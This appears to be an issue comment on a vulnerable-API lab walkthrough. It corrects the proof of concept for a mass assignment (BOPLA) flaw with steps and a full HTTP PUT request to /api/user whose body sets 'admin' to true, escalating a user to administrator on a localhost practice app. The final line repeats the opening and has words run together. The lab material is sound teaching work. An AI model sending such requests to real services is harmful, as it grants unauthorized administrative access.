Hey man, I was going through the walkthrough & I noticed that the PoC of "mass Assignment" aka "BOPLA" is incorrect.
- Create an user in the application.
- Check the JSON objects in the HTTP Response.
- Login with the created user to fetch JWT Token.
- Fetch the current user information using
/api/user endpoint.
- Change the HTTP method to PUT, copy the JSON object present in the HTTP Response Header, paste it in HTTP Request Body only keep
admin json object with its value as true.
request:
PUT /api/user HTTP/1.1
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Authorization: Token xxxxxx
User-Agent: PostmanRuntime/7.54.0
Accept: */*
Postman-Token: a898b3be-398c-48ca-8f2a-f340f61be5b7
Host: localhost:8000
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 23
{"user":{"admin":true}}
Hey man, I was going through the walkthrough & I noticed that the PoC of "mass Assignment" aka "BOPLA" is incorrect.
/api/userendpoint.adminjson object with its value astrue.